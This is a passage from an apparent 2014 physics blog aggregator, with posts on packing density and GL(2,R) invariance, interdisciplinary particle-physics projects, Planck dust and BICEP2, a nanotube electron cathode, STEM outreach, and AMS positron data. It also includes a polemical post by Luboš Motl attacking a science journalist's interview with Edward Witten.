as follows. For each shape <semantics>SShapes<annotation encoding="application/x-tex">S \in Shapes</annotation></semantics> and lattice <semantics>LLattices<annotation encoding="application/x-tex">L \in Lattices</annotation></semantics>, if we rescale <semantics>S<annotation encoding="application/x-tex">S</annotation></semantics> by a sufficiently small constant, the resulting shape <semantics>αS<annotation encoding="application/x-tex">\alpha S</annotation></semantics> will have the property that the regions <semantics>αS+<annotation encoding="application/x-tex">\alpha S + \ell</annotation></semantics> are disjoint as <semantics><annotation encoding="application/x-tex">\ell</annotation></semantics> ranges over <semantics>L 2<annotation encoding="application/x-tex">L \subseteq \mathbb{R}^2</annotation></semantics>. So, for small enough <semantics>α<annotation encoding="application/x-tex">\alpha</annotation></semantics>, <semantics>αS+L<annotation encoding="application/x-tex">\alpha S + L</annotation></semantics> will be a way of packing the plane by rescaled copies of <semantics>S<annotation encoding="application/x-tex">S</annotation></semantics>. We can take the supremum of the density of <semantics>αS+L<annotation encoding="application/x-tex">\alpha S + L</annotation></semantics> over such <semantics>α<annotation encoding="application/x-tex">\alpha</annotation></semantics>, and call it

<semantics>density(S,L)<annotation encoding="application/x-tex">density(S,L) </annotation></semantics>

Thanks to the theorem of László Fejes Tóth and C. A. Rogers, the maximum packing density of the shape <semantics>S<annotation encoding="application/x-tex">S</annotation></semantics> is

<semantics>sup LLatticesdensity(S,L)<annotation encoding="application/x-tex"> \sup_{L \in Lattices} density(S,L) </annotation></semantics>

Here I’m taking advantage of the obvious fact that the maximum packing density of <semantics>S<annotation encoding="application/x-tex">S</annotation></semantics> equals that of any rescaled version <semantics>αS<annotation encoding="application/x-tex">\alpha S</annotation></semantics>. And in using the word ‘maximum’, I’m also taking for granted that the supremum is actually attained.

Given all this, the pessimization problem for packing centrally symmetric convex regions is all about finding

<semantics>inf SShapessup LLatticesdensity(S,L)<annotation encoding="application/x-tex"> \inf_{S \in Shapes} \; \sup_{L \in Lattices} density(S,L) </annotation></semantics>

But there’s more nice symmetry at work here. Linear transformations of the plane act on shapes, and lattices, and packings… and the concept of density is invariant under linear transformations!

One thing this instantly implies is that the maximum packing density for a centrally symmetric convex region doesn’t change if we apply a linear transformation to that region.

This is quite surprising. You might think that stretching or shearing a region could give a radically new way to pack it as densely as possible. And indeed that’s probably true in general. But for centrally symmetric convex regions, the densest packings are all lattice packings. So if we stretch or shear the region, we can just stretch or shear the lattice packing that works best, and get the lattice packing that works best for the stretched or sheared region. The packing density is unchanged!

We can say this using jargon. The group of linear transformations of the plane is <semantics>GL(2,)<annotation encoding="application/x-tex">GL(2, \mathbb{R})</annotation></semantics>. This acts on <semantics>Shapes<annotation encoding="application/x-tex">Shapes</annotation></semantics> and <semantics>Lattices<annotation encoding="application/x-tex">Lattices</annotation></semantics>, and for any <semantics>gGL(2,)<annotation encoding="application/x-tex">g \in GL(2, \mathbb{R})</annotation></semantics> we have

<semantics>density(gS,gL)=density(S,L)<annotation encoding="application/x-tex"> density(g S, g L) = density(S,L) </annotation></semantics>

So, the function

<semantics>density:Shapes×Lattices[0,1]<annotation encoding="application/x-tex"> density: Shapes \times Lattices \to [0,1] </annotation></semantics>

is <semantics>GL(2,)<annotation encoding="application/x-tex">GL(2,\mathbb{R})</annotation></semantics>-invariant. And thus, the maximum packing density is invariant:

<semantics>sup LLatticesdensity(S,L)=sup LLatticesdensity(gS,L)<annotation encoding="application/x-tex"> \sup_{L \in Lattices} density(S,L) = \sup_{L \in Lattices} density(g S,L) </annotation></semantics>

for all <semantics>gGL(2,)<annotation encoding="application/x-tex">g \in GL(2,\mathbb{R})</annotation></semantics>.

As mentioned before, we also have

<semantics>density(αS,L)=density(S,L)<annotation encoding="application/x-tex"> density(\alpha S, L) = density(S, L) </annotation></semantics>

where <semantics>α<annotation encoding="application/x-tex">\alpha</annotation></semantics> is any nonzero scalar multiple of the identity matrix (and thus a rescaling if <semantics>α>0<annotation encoding="application/x-tex">\alpha &gt; 0</annotation></semantics>). So, we can replace <semantics>Shapes<annotation encoding="application/x-tex">Shapes</annotation></semantics> by the quotient spaces <semantics>Shapes/ *<annotation encoding="application/x-tex">Shapes/\mathbb{R}^*</annotation></semantics>, and work with

<semantics>density:Shapes/ *×Lattices[0,1]<annotation encoding="application/x-tex"> density: Shapes/\mathbb{R}^* \times Lattices \to [0,1] </annotation></semantics>

<semantics>GL(2,)<annotation encoding="application/x-tex">GL(2,\mathbb{R})</annotation></semantics> still acts on the first factor here, with scalar multiples of the identity acting trivially, and this map is still <semantics>GL(2,)<annotation encoding="application/x-tex">GL(2,\mathbb{R})</annotation></semantics>-invariant.

I think there should be a topology on <semantics>Shapes<annotation encoding="application/x-tex">Shapes</annotation></semantics> that makes the quotient space <semantics>Shapes/ *<annotation encoding="application/x-tex">Shapes/\mathbb{R}^*</annotation></semantics> compact and makes

<semantics>density:Shapes×Lattices[0,1]<annotation encoding="application/x-tex"> density: Shapes \times Lattices \to [0,1] </annotation></semantics>

continuous. Something like the Hausdorff metric, maybe. Can anyone help me here?

None of this goes far in solving the packing pessimization problem for convex centrally symmetric regions in the plane. We’ve reduced the number of degrees of freedom, but they’re still infinite.

But still, it’s fun. I like how it’s vaguely reminiscent of the theory of modular functions, which can be seen as <semantics>SL(2,)<annotation encoding="application/x-tex">SL(2,\mathbb{R})</annotation></semantics>-invariant functions of a lattice together with an ellipse centered at the origin.

References and Addenda

For more on packing pessimization problems, see:

To see who drew the pretty pictures, click on the pictures.

There’s a lot of good stuff in the comments. Most notably:

• The set <semantics>Shapes/GL(2,)<annotation encoding="application/x-tex">Shapes/GL(2,\mathbb{R})</annotation></semantics> has a nice topology making it a compact space. This is the moduli space of 2-dimensional real Banach spaces! In general, the moduli space of <semantics>n<annotation encoding="application/x-tex">n</annotation></semantics>-dimensional real Banach spaces is called a Banach–Mazur compactum; click the link for details on its topology.

• Amazingly, there is a one-parameter family of maximally dense packings of the smoothed octagon! Greg Egan has made a movie showing all these packings:

As the smoothed octagons turn, their centers move but the area in each space between them stays the same!

by john ( at September 23, 2014 10:39 PM

arXiv blog

Human Contact Patterns in High Schools Hint at Epidemic Containment Strategies

The first study of contact patterns between high school students suggests new ways to halt the spread of disease.

September 23, 2014 02:27 PM

Symmetrybreaking - Fermilab/SLAC

When research worlds collide

Particle physicists and scientists from other disciplines are finding ways to help one another answer critical questions.

When particle physics and other fields of science meet, interesting things happen. Cosmic rays are put to use studying cloud formation. A particle detector tackles questions about aircraft engineering. Invisible particles offer clues about the interior of the Earth.

All researchers are trying to understand how the world works; they just go about it in different ways. Through interdisciplinary projects, scientists from different backgrounds can offer one another new technology, techniques and perspectives.

Researchers Jasper Kirkby of CERN, Anton Tremsin of the University of California, Berkeley, and Bill McDonough of the University of Maryland have all reached out to forge unique connections with other researchers, pursuing diverse goals with tools from particle physics.

Understanding climate with cosmic rays

Jasper Kirkby is an experimental particle physicist who’s worked on several big accelerator experiments at SLAC National Accelerator Laboratory and CERN since 1972.

Nearly 20 years ago, he heard a talk about cosmic rays and cloud formation. Cloud formation is a key component of climate models because clouds scatter sunlight, providing a cooling effect in the atmosphere. As Kirkby learned at the talk, cloud formation seemed to correlate with the appearance of cosmic rays, high-energy particles—mostly protons—that rain on the Earth from space.

Clouds form when water condenses around aerosol particles, tiny liquid or solid particles suspended in the air. It was speculated that cosmic rays ionizing atmospheric vapors could help these cloud seeds to form. However, both aerosol particle formation and atmospheric vapors are poorly understood.

After the talk, Kirkby wrote a paper about how this process could be investigated under controlled conditions in the laboratory using an ultra-clean atmospheric chamber and a proton beam to simulate the cosmic rays. He called the proposed chamber CLOUD, for Cosmics Leaving Outdoor Droplets. Kirkby then went on a roadshow around Europe to discuss his ideas with the atmospheric community, starting at University of Berne in May 1998.

“With interdisciplinary ideas, you really stick your neck out,” Kirkby says. “And I did not want to do this unless the atmospheric community thought it was a good idea.”

Kirkby picked up collaborators along the way and formed what he calls a “dream team” for the CLOUD experiment. “There is a mixing of scientific cultures and techniques that can be very powerful,” Kirkby says. “No one person has all the answers, but each individual brings in novel ideas and expertise.”

Members of Kirkby’s team are able to introduce trace amounts of different vapors at the part-per-trillion level into the CLOUD chamber. They use measurements of the actual atmosphere to determine which mixtures to test. “We can isolate precisely what vapors are important and quantify how they interact under different conditions,” Kirkby says, “but we need the field measurements to narrow down the choices.”

The CLOUD team now consists of 80 scientists from 17 different institutions in nine countries. They receive funding from CERN, a variety of other organizations in Europe and Russia, and the National Science Foundation. The collaboration has published several papers in Nature and Science that have established the main vapors responsible for formation of cloud seeds.

Getting started was difficult, though, Kirkby says, because funding for cross-disciplinary projects can be difficult to secure. “You fall between the cracks of traditional funding agencies,” he says. “Interdisciplinary research can be a high-risk venture, like a start-up. It’s not for the faint-hearted. But you have the possibility to make disruptive scientific advances.”

One tool for many scientists

Sometimes, instead of a research puzzle, you have a tool just waiting for a new problem to solve.

Anton Tremsin, a researcher at the Space Science Laboratory at UC Berkeley, works with Timepix, a chip that rapidly collects and digitizes signals from particles. The chip is based on technology initially developed to measure particles in accelerator experiments at CERN.

Timepix chips can be used in neutron imaging, which works somewhat like X-ray imaging. In an X-ray image on film, areas with the highest density or the heaviest elements—for example, the bones or teeth in an X-ray of a body—look the brightest. Dense areas contain the most electrons, which interact with the X-rays and stop them from passing through to leave their mark on the film.

Neutrons, however, interact with the nuclei of atoms. So a neutron image can be more nuanced than an X-ray image. It can distinguish between many types of materials, each of which affects the neutrons in a different way. Neutron imaging can reveal the different organs inside a horsefly, show the concentration of hydrogen in a metal or find a flower growing behind a granite wall.

Today, Timepix is used to test the stability of aircraft, to examine ancient Japanese swords and to evaluate meteorite samples, among other diverse projects.

“It’s been so variable in terms of applications,” Tremsin says. “I couldn’t even predict how Timepix might be used in the future.”

The collaboration involved in developing Timepix is large, with dozens of groups actively using the technology. With funding from NASA, NSF and the Department of Energy, Tremsin works with two Timepix chips he built at UC Berkeley and later installed at Rutherford Appleton Laboratory in Oxfordshire, England, and at Oak Ridge National Laboratory in Tennessee. Both of these labs are hubs for neutron imaging.

A colleague at Oak Ridge National Laboratory put Tremsin in contact with Yan Gao, a senior scientist at GE Global Research in Schenectady, New York. Gao uses Timepix to evaluate turbine blades used for aircraft engines and generators.

The two researchers have now been working together for more than a year.

“It’s been a fruitful and active collaboration,” Gao says. “Anton not only has scientific talent, but he’s also persistent in trying to use his detector to solve real-world problems.”

The blades for aircraft engines must be made of a material that can withstand stress under high temperatures, Gao says. “To develop such a material, you need to understand the microstructure,” he says. “And to do this type of imaging well, you need a detector with high resolution like Timepix.”

Gao often works with researchers at universities and national labs. He says frequent communication with a wide range of scientists is key to ensuring that people with useful tools meet people with interesting research questions.

Tremsin has also paired up with Ed Perfect, professor of earth and planetary sciences at the University of Tennessee.

For Perfect, the allure of Timepix is its ability to monitor changes over time. He uses Timepix chips to look at the ways hydrogen-rich liquids such as water and oil travel through different earth materials. Understanding this movement is important for a broad range of processes, including hydraulic fracturing and enhanced oil recovery.

To study the flow of fluid through sandstone and shale, Perfect brings water into contact with the base of fractured rock cores at Oak Ridge’s CG-1D neutron imaging beam line. The water is drawn into the fracture zone upon contact. Perfect says he has been surprised by how quickly fluids can move through these porous media.

“With the imaging from this detector, we are able to capture dynamic processes we’ve not really seen before,” Perfect says. “In fact, I’m still scratching my head about how to interpret the observations, because it’s not explained by our traditional theory.”

Although its list of applications is already quite long, Tremsin still thinks there are more ways to use Timepix. “We’re still trying to demonstrate what can be done and what can be measured,” he says. “I hope there will be many more new applications.”

Using neutrinos to discover what's beneath our feet

Bill McDonough, professor of geology at the University of Maryland, first connected with particle physics when he was asked to review a paper submitted to Nature in 2005. The paper announced the detection of geoneutrinos—neutrinos emitted during the radioactive decay of uranium and thorium in the Earth’s interior—by the KamLAND experiment in Japan.

McDonough had never been asked to serve as a reviewer for a particle physics publication. He was intrigued, in part because a decade earlier he had written a paper about the estimated abundance of different elements, including uranium, in the Earth’s interior.

“Like others, I made a hypothesis, but I never thought we’d be able to measure how much uranium is inside the Earth,” McDonough says.

The KamLAND geoneutrinos result wound up making the cover of Nature. “The first detection of geoneutrinos from beneath our feet is a landmark result,” McDonough wrote in the introduction to the article. “It will allow better estimation of the abundances and distributions of radioactive elements in the Earth, and of the Earth's overall heat budget.”

Of all the elements, three—uranium, thorium and potassium—produce over 99 percent of the heat from one of the two sources of Earth’s interior energy, radioactive decay. The other source is primordial energy, kinetic energy leftover from the formation of the Earth and its core.

Earth’s interior energy powers a long list of big processes on the Earth’s surface: plate tectonics, the formation and movement of new oceanic crust; subduction, the movement of an oceanic plate beneath the crust and inside the Earth; convection, the stirring of the mantle; and also the creation of the magnetosphere through convection in the liquid outer core.

After the Nature paper was published, one of the authors, John Learned, a professor and member of the high-energy physics group at the University of Hawaii, called McDonough to discuss working together to measure the Earth’s energy budget with geoneutrinos.

“Since then, we’ve been trading information at a high rate,” Learned says. “Bill has given us the data and geological models we need to predict the neutrino flux.”

There are ways to measure the heat coming out of the planet. But before geoneutrinos, it was difficult to know its source. “As a chemist, I would like to take the Earth, dissolve it in a beaker and then analyze it and tell you exactly what its composition is,” McDonough says. “There are of course consequences to dissolving the Earth.”

McDonough receives most of his funding from NSF. But geoneutrino studies are a truly a global effort, with currently operating detectors in Japan and Italy, one coming online soon in Canada and another planned in China. Learned and McDonough are working together to plan a detector, to be constructed in Hawaii, that can be moved around on the ocean floor.

“We help each other understand the other’s field,” McDonough says. “We all have a high level of curiosity and drive to answer these questions.”

It takes years to get results from geoneutrino experiments. The detector in Japan sees about one geoneutrino every month, and the detector in Italy one every two to three months. But all the while, scientists are learning.

“We know less about the center of the Earth than we do about the sun,” Learned says. “We do not understand what’s beneath our feet, except for a few kilometers down. Neutrinos give us a chance to probe.”

When sciences meet

Researchers are using particle physics technology to understand some of the biggest processes on the planet and to observe its tiniest and most inaccessible nooks and crannies.

The partnerships forged to do this research can bring new energy as new ideas flow, Kirkby says. “Scientists tend to get specialized, but you get a chance to break away from that,” he says.

“And it’s a lot of fun to learn so much new stuff.” When scientists get creative, it creates opportunities for better science, with exciting results.


Like what you see? Sign up for a free subscription to symmetry!

by Amanda Solliday at September 23, 2014 01:00 PM

Lubos Motl - string vacua and pheno

An interview with Edward Witten at a bizarre place
Most events in the "science journalism" of the recent years have been really strange, to put it extremely mildly. So the following thing is probably just another example of the rule. But listen.

John Horgan is a loud, violent, and obnoxious critic of science who believes that science has ended. In fact, he has also written extensive texts about the end of mathematics. The oppressive numbers, functions, and groups have collapsed and all this fantasy called mathematics is over, Horgan has informed his readers.

Before he published a loony "book" titled "The End of Science" sometime in the mid 1990s, he would also interview Edward Witten (in 1991). Well, the word "interview" is too strong. Horgan himself had to admit that it was a childish yet brutally malicious assault on theoretical physics in general, string theory in particular, and Witten as a person.

Now, in the wake of the Kyoto Prize that Witten won – congratulations but no surprise – we may read another interview with Witten in the Scientific American's blogs hosted by... John Horgan.
Physics Titan Edward Witten Still Thinks String Theory “On the Right Track”
I don't actually know whether Witten knew that he was being interviewed by the e-mail but the text surely makes you believe that he did and we're told that some "publicist" behind the Kyoto Prize had to choose Horgan as the "interviewer". Oh my God.

In the new interview, John Horgan clearly presents himself as Edward Witten's peer – to say the least. But even a kid from a kindergarten could be able to see that these two men differ, anyway. First of all, when they mention other men's names, they are very different names.

Aside from less shocking names, Horgan offers such "monster minds" as Peter W*it and Sean Carroll to make some of his points. Witten prefers to refer to physicists like Steve Weinberg, Lenny Susskind, and Martin Rees. The kid in the kindergarten could perhaps notice the 20 floors of the skyscraper in between these two groups of "authorities".

Witten is asked – with an apparent malicious intent of Horgan's – whether he is "still" (why the hell is there the word "still"?) confident that string theory will turn out to be "right" (these quotes around "right" are there). Witten's answer is that he wouldn't have to modify what he said in 1991. It means Yes.

Does string theory have rivals? The answer by the most cited theoretical physicist (and perhaps scientist) is that there are not any interesting competing suggestions. Be sure that people attending my popular talks (and sometimes radio hosts etc.) often ask the same question and I give the same answer. One reason, as Witten reminds us, is that ideas that actually have something good about them, like twistors and noncommutative geometry, are gradually identified as aspects of string theory itself and absorbed by string theory. It's just how the things are.

Horgan also promotes his and his pals' pet idea that string theory has to be unscientific because it predicts the landscape. Witten calmly and carefully answers that the landscape simply may be genuine, certain quantities may be incalculable from the first principles, and we just can't or shouldn't fight against this reality. In fact, even in such a case, the existence of the landscape and the incalculability of many things may get scientifically established, in one of the several possible scenarios he outlines. Witten also mentions the prediction of the tiny positive cosmological constant as a big success of this reasoning.

Concerning falsification, well-defined predictions that are empirically validated or falsified are the "gold standard" of science, Witten says, but it's way too narrow-minded to imagine that all of science works in this way. Instead, much or most of science is about efforts to discover things – even though, in principle, even discoveries of new things may be awkwardly interpreted as the "falsification of hypotheses that these new things don't exist".

Horgan seems to repeat the same "question" about thrice – whether the multiverse is scientific – and Witten generously takes Horgan's being slow and retarded into account and he patiently answers the same question thrice, too. The multiverse may be a feature of Nature so even if it is inconvenient for our abilities to make predictions, we must take this possibility into account and collect evidence whether it is right or wrong, and if it is right, learn more details about it. Nature isn't obliged to make the physicists' lives convenient.

Can science explain how exactly the Universe was born? Witten first tries to correct Horgan's constantly overhyped vocabulary – like "the exact understanding". We want a better understanding and there's been lots of progress with inflation, some spectral lines, and so on. One staggering aspect of the interview are Horgan's "errata". For example, Witten mentions that the evidence supporting inflationary cosmology is vastly greater than it was in 1991. The readers are offered an erratum from a superior mind (and Witten's new supervisor?) John Horgan, however:
[Horgan: I don't accept that the evidence for inflation is "vastly greater" now than in 1996. See my post on inflation under Further Reading.]
Wow, this is just incredible. What does he think about himself? Even among science journalists, he belongs to the bottom 20%, and even if he managed to reach the average, the average science journalist's IQ is about 50 points below that of the leading theoretical physicists (and they have a correspondingly lower knowledge). And the person who was interviewed wasn't just a leading theoretical physicist. It was Edward Witten himself. Why do you ask questions about fundamental physics to Prof Witten, Mr Horgan, if you are so much smarter than he is? Why do you need to interview the Kyoto Prize winners? You could write your better answers by yourself, or with the help from Peter W*it, Lee Sm*lin, or any troll you may find on the Internet (I can give you a dozen of e-mails of such "geniuses" accumulated in the blacklist on this very blog).

Finally, when asked about philosophy and religion, Witten answers that he prefers science and "philosophers of Nature" such as Maxwell.

If you haven't lost your breath yet, there is an extra cherry on a pie for you. Now, when I am writing this report, the interview with the world's most cited physicist has exactly one comment – by a man named Carlo Rovelli (a loop quantum gravity "thinker" who recently cried that it was so bad for science to separate from theology and other humanities) who offers his own delusions about string theory's being on a wrong track and a wish that Horgan should have used a talking point about supersymmetry at the very beginning. You may see that people like Rovelli aren't really on the "science side" of these disagreements. They have nothing to do with quality scientific research; they are on the side of the likes of John Horgan and their empty skulls.

The interview, its location, organization, and overall appearance seems so insulting that I would be ready to believe the hypothesis that an enemy of Edward Witten decided to award him with the Kyoto Prize so that Witten may be humiliated in this way. The disconnect between the quality physics research and the junk that most of the laymen are being served is so extreme that the communication is sort of pointless – except that sometimes physicists may be forced to communicate with the likes of John Horgan, e.g. if they win a prize and an organizer wants to have some painful kind of fun.

by Luboš Motl ( at September 23, 2014 10:13 AM

Clifford V. Johnson - Asymptotia

STEM Keynote
keynote_at_stem_divide_cvjAs I mentioned, a couple of Saturdays ago I gave the keynote address at a one-day conference designed to introduce STEM Careers to underrepresented students from various neighboring schools. The event* was co-sponsored by the Level Playing Field Institute, but sadly the details of it seem to have vanished from their site now that the event has passed, which is unfortunate. It was good to see a room full of enthusiastic students wanting to learn more about such careers (STEM = Science, Technology, Engineering and Mathematics) and I tried to give some thoughts about some of the reasons that there's such poor representation by people of color (the group I was asked to focus on, although I mentioned that many of my remarks also extended to women to some extent) in such fields, and what can be done about it. Much of my focus, as you can guess from the issues I bring up here from time to time, was on battling the Culture: The perception people have of who "belongs" and who does not, and how that perception makes people act, consciously or otherwise, the images we as a society present and perpetuate in our media and in our conversations and conventions throughout everyday life, and so on. I used my own experience as an example at various points, which may or may not have been helpful - I don't know. My experience, in part and in brief, is this: I went a long way into being excited [...] Click to continue reading this post

by Clifford at September 23, 2014 01:33 AM

September 22, 2014

Symmetrybreaking - Fermilab/SLAC

Cosmic dust proves prevalent

Space dust accounts for at least some of the possible signal of cosmic inflation the BICEP2 experiment announced in March. How much remains to be seen.

Space is full of dust, according to a new analysis from the European Space Agency’s Planck experiment.

That includes the area of space studied by the BICEP2 experiment, which in March announced seeing a faint pattern left over from the big bang that could tell us about the first moments after the birth of the universe.

The Planck analysis, which started before March, was not meant as a direct check of the BICEP2 result. It does, however, reveal that the level of dust in the area BICEP2 scientists studied is both significant and higher than they thought.

“There is still a wide range of possibilities left open,” writes astronomer Jan Tauber, ESA project scientist for Planck, in an email. “It could be that all of the signal is due to dust; but part of the signal could certainly be due to primordial gravitational waves.”

BICEP2 scientists study the cosmic microwave background, a uniform bath of radiation permeating the universe that formed when the universe first cooled enough after the big bang to be transparent to light. BICEP2 scientists found a pattern within the cosmic microwave background, one that would indicate that not long after the big bang, the universe went through a period of exponential expansion called cosmic inflation. The BICEP2 result was announced as the first direct evidence of this process.

The problem is that the same pattern, called B-mode polarization, also appears in space dust. The BICEP2 team subtracted the then known influence of the dust from their result. But based on today’s Planck result, they didn’t manage to scrub all of it.

How much the dust influenced the BICEP2 result remains to be seen.

In November, Planck scientists will release their own analysis of B-mode polarization in the cosmic microwave background, in addition to a joint analysis with BICEP2 specifically intended to check the BICEP2 result. These results could answer the question of whether BICEP2 really saw evidence of cosmic inflation.

“While we can say the dust level is significant,” writes BICEP2 co-leader Jamie Bock of Caltech and NASA’s Jet Propulsion Laboratory, “we really need to wait for the joint BICEP2-Planck paper that is coming out in the fall to get the full answer.”


Like what you see? Sign up for a free subscription to symmetry!

by Kathryn Jepsen at September 22, 2014 06:03 PM

Quantum Diaries

Breakthrough: nanotube cathode creates more electron beam than large laser system

This article appeared in Fermilab Today on Sept. 22, 2014.

Harsha Panunganti of Northern Illinois University works on the laser system (turned off here) normally used to create electron beams from a photocathode. Photo: Reidar Hahn

Harsha Panunganti of Northern Illinois University works on the laser system (turned off here) normally used to create electron beams from a photocathode. Photo: Reidar Hahn

Lasers are cool, except when they’re clunky, expensive and delicate.

So a collaboration led by RadiaBeam Technologies, a California-based technology firm actively involved in accelerator R&D, is designing an electron beam source that doesn’t need a laser. The team led by Luigi Faillace, a scientist at RadiaBeam, is testing a carbon nanotube cathode — about the size of a nickel — in Fermilab’s High-Brightness Electron Source Lab (HBESL) that completely eliminates the need for a room-sized laser system currently used to generate the electron beam.

Fermilab was sought out to test the experimental cathode because of its capability and expertise for handling intense electron beams, one of relatively few labs that can support this project.

Tests have shown that the vastly smaller cathode does a better job than the laser. Philippe Piot, a staff scientist in the Fermilab Accelerator Division and a joint appointee at Northern Illinois University, says tests have produced beam currents a thousand to a million times greater than the one generated with a laser. This remarkable result means that electron beam equipment used in industry may become not only less expensive and more compact, but also more efficient. A laser like the one in HBESL runs close to half a million dollars, Piot said, about hundred times more than RadiaBeam’s cathode.

The technology has extensive applications in medical equipment and national security, as an electron beam is a critical component in generating X-rays. And while carbon nanotube cathodes have been studied extensively in academia, Fermilab is the first facility to test the technology within a full-scale setting.

“People have talked about it for years,” said Piot, “but what was missing was a partnership between people that have the know-how at a lab, a university and a company.”

The dark carbon-nanotube-coated area of this field emission cathode is made of millions of nanotubes that function like little lightning rods. At Fermilab's High-Brightness Electron Source Lab, scientists have tested this cathode in the front end of an accelerator, where a strong electric field siphons electrons off the nanotubes to create an intense electron beam. Photo: Reidar Hahn

The dark carbon-nanotube-coated area of this field emission cathode is made of millions of nanotubes that function like little lightning rods. At Fermilab’s High-Brightness Electron Source Lab, scientists have tested this cathode in the front end of an accelerator, where a strong electric field siphons electrons off the nanotubes to create an intense electron beam. Photo: Reidar Hahn

Piot and Fermilab scientist Charles Thangaraj are partnering with RadiaBeam Technologies staff Luigi Faillace and Josiah Hartzell and Northern Illinois University student Harsha Panuganti and researcher Daniel Mihalcea. A U.S. Department of Energy Small Business Innovation Research grant, a federal endowment designed to bridge the R&D gap between basic research and commercial products, funds the project. The work represents the kind of research that will be enabled in the future at the Illinois Accelerator Research Center — a facility that brings together Fermilab expertise and industry.

The new cathode appears at first glance like a smooth black button, but at the nanoscale it resembles, in Piot’s words, “millions of lightning rods.”

“When you apply an electric field, the field lines organize themselves around the rods’ extremities and enhance the field,” Piot said. The electric field at the peaks is so intense that it pulls streams of electrons off the cathode, creating the beam.

Traditionally, lasers strike cathodes in order to eject electrons through photoemission. Those electrons form a beam by piggybacking onto a radio-frequency wave, synchronized to the laser pulses and formed in a resonance cavity. Powerful magnets focus the beam. The tested nanotube cathode requires no laser as it needs only the electric field already generated by the accelerator to siphon the electrons off, a process dubbed field emission.

The intense electric field, though, has been a tremendous liability. Piot said critics thought the cathode “was just going to explode and ruin the electron source, and we would be crying because it would be dead.”

One of the first discoveries Piot’s team made when they began testing in May was that the cathode did not, in fact, explode and ruin everything. The exceptional strength of carbon nanotubes makes the project feasible.

Still, Piot continues to study ways to optimize the design of the cathode to prevent any smaller, adverse effects that may take place within the beam assembly. Future research also may focus on redesigning an accelerator that natively incorporates the carbon nanotube cathode to avoid any compatibility issues.

Troy Rummler

by Fermilab at September 22, 2014 02:50 PM

Lubos Motl - string vacua and pheno

A simple explanation behind AMS' electron+positron flux power law?
Aside from tweets about the latest, not so interesting, and inconclusive Planck paper on the dust and polarized CMB, Francis Emulenews Villatoro tweeted the following suggestive graphs to his 7,000+ Twitter followers:

The newest data from the Alpha Magnetic Spectrometer are fully compatible with the positron flux curve resulting from an annihilating lighter than \(1\TeV\) dark matter particle. But the steep drop itself hasn't been seen yet (the AMS' dark matter discovery is one seminar away but it may always be so in the future LOL) and the power-law description seems really accurate and attractive.

What if neither dirty pulsars nor dark matter is the cause of these curves? All of those who claim to love simple explanations and who sometimes feel annoyed that physics has gotten too complicated are invited to think about the question.

The fact at this moment seems to be that above the energy \(30\GeV\) and perhaps up to \(430\GeV\) or much higher, the positrons represent \(0.15\) of the total electron+positron flux. Moreover, this flux itself depends on the energy via a simple power law:\[

\Phi(e^- + e^+) = C \cdot E^\gamma

\] where the exponent \(\gamma\) has a pretty well-defined value.

Apparently, things work very well in that rather long interval if the exponent (spectral index) is\[

\gamma= -3.170 \pm 0.008 \pm 0.008

\] The first part of the error unifies the systematic and statistical error; the other one is from the energy scale errors. At any rate, the exponent is literally between \(-3.18\) and \(-3.16\), quite some lunch for numerologists.

My question for the numerologist and simple ingenious armchair physicist (and others!) reading this blog is: what in the Universe may produce such a power law for the positron and electron flux, with this bizarre negative exponent?

The thermal radiation is no good if the temperature \(kT\) is below those \(30\GeV\): you would get an exponential decrease. You may think about the thermal radiation in some decoupled component of the Universe whose temperature is huge, above \(430\GeV\), but then you will get something like \(\gamma=0\) or a nearby integer instead of the strange, large, and fractional negative constant.

You may continue by thinking about some sources distributed according to this power law, for example microscopic (but I mean much heavier than the Planck mass!) black holes. Such Hawking-radiating black holes might emit as many positrons as electrons so it doesn't look great but ignore this problem – there may be selective conversion to electrons because of some extra dirty effects, or enhanced annihilation of positrons.

If you want the Hawking radiation to have energy between \(30\) and \(430\GeV\), what is the radius and size of the black hole? How many black holes like that do you need to get the right power law? What will be their mass density needed to obtain the observed flux? Is this mass density compatible with the basic data about the energy density that we know?

Now, if that theory can pass all your tests, you also need the number of smaller i.e. lighter i.e. hotter microscopic black holes (those emitting higher-energy radiation) to be larger. Can you explain why the small black holes should dominate in this way? May the exponent \(-3.17\) appear in this way? Can you get this dominance of smaller black holes in the process of their gradual merger? Or thanks to the reduction of their sizes during evaporation?

I am looking forward to your solutions – with numbers and somewhat solid arguments. You can do it! ;-)

A completely different explanation: the high-energy electrons and positrons could arise from some form of "multiple decoupling events" in the very high-energy sector of the world that isn't in thermal equilibrium with everything else. Can you propose a convincing model about the moments of decoupling and the corresponding temperature that would produce such high-energy particles?

by Luboš Motl ( at September 22, 2014 01:49 PM

Lubos Motl - string vacua and pheno

A pro-BICEP2 paper
Update Sep 22nd: a Planck paper on polarization is out, suggesting dust could explain the BICEP2 signal – or just 1/2 of it – but lacking the resolution to settle anything. A joint Planck-BICEP2 paper should be out in November but it seems predetermined that they only want to impose an upper bound on \(r\) so it won't be too strong or interesting, either.
It's generally expected that the Planck collaboration should present their new results on the CMB polarization data within days, weeks, or a month. Will they be capable of confirming the BICEP2 discovery – or refute it by convincing data?

Ten days ago, Planck published a paper on dust modelling:
Planck intermediate results. XXIX. All-sky dust modelling with Planck, IRAS, and WISE observations
I am not able to decide whether this paper has anything to say about the discovery of the primordial gravitational waves. It could be relevant but note that the paper doesn't discuss the polarization of the radiation at all.

Perhaps more interestingly, Wesley Colley and Richard Gott released their preprint
Genus Topology and Cross-Correlation of BICEP2 and Planck 353 GHz B-Modes: Further Evidence Favoring Gravity Wave Detection
that seems to claim that the data are powerful enough to confirm some influence of the dust yet defend the notion that the primordial gravitational waves have to represent a big part of the BICEP2 observation, too.

What did they do? Well, they took some new publicly available maps by Planck – those at the frequency 353 GHz (wavelength 849 microns). Recall that the claimed BICEP2 discovery appeared at the frequency 150 GHz (wavelength 2 millimeters).

They assume, hopefully for good reasons, that the dust's contribution to the data should be pretty much the same for these two frequencies, up to an overall normalization. Planck sees a lot of radiation at 353 GHz – if all of it were due to dust, the amount of dust would be enough to account for the whole BICEP2 signal.

However, if this were the case, the signals in the BICEP2 patch of the sky at these two frequencies would have to be almost perfectly correlated with each other. Instead, Colley and Gott see the correlation coefficient to be\[

15\% \pm 4\%

\] (does someone understand why the \(\rm\LaTeX\) percent sign has a tilde connecting the upper circle with the slash?) which is "significantly" (four-sigma) different from zero but it is still decidedly smaller than 100 percent. The fact that this correlation is much smaller than 100% implies that most of the BICEP2 signal is uncorrelated to what is classified as dust by the Planck maps or, almost equivalently, that most of the observations at 353 GHz in the BICEP2 region is due to noise, not dust.

